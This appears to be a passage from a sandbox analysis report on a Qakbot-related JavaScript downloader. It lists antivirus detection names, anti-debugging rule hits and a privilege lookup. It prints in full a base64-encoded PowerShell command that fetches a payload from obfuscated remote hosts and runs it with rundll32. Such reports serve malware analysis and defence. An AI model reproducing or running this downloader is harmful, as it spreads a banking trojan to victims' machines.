QBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
FireEye JS:Trojan.Cryxos.12541
VIPRE JS:Trojan.Cryxos.12541
Cyren JS/Qbot.I!Eldorado
Symantec Scr.Malcode!gen53
Cynet Malicious (score: 99)
BitDefender JS:Trojan.Cryxos.12541
MicroWorld-eScan JS:Trojan.Cryxos.12541
F-Secure Malware.JS/Qakbot.G
Emsisoft JS:Trojan.Cryxos.12541 (B)
Avira JS/Qakbot.G
MAX malware (ai score=86)
Arcabit JS:Trojan.Cryxos.D30FD
GData JS:Trojan.Cryxos.12541
Google Detected
ALYac JS:Trojan.Cryxos.12541
Ikarus Trojan.Script
parent_process wscript.exe martian_process powershell -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiA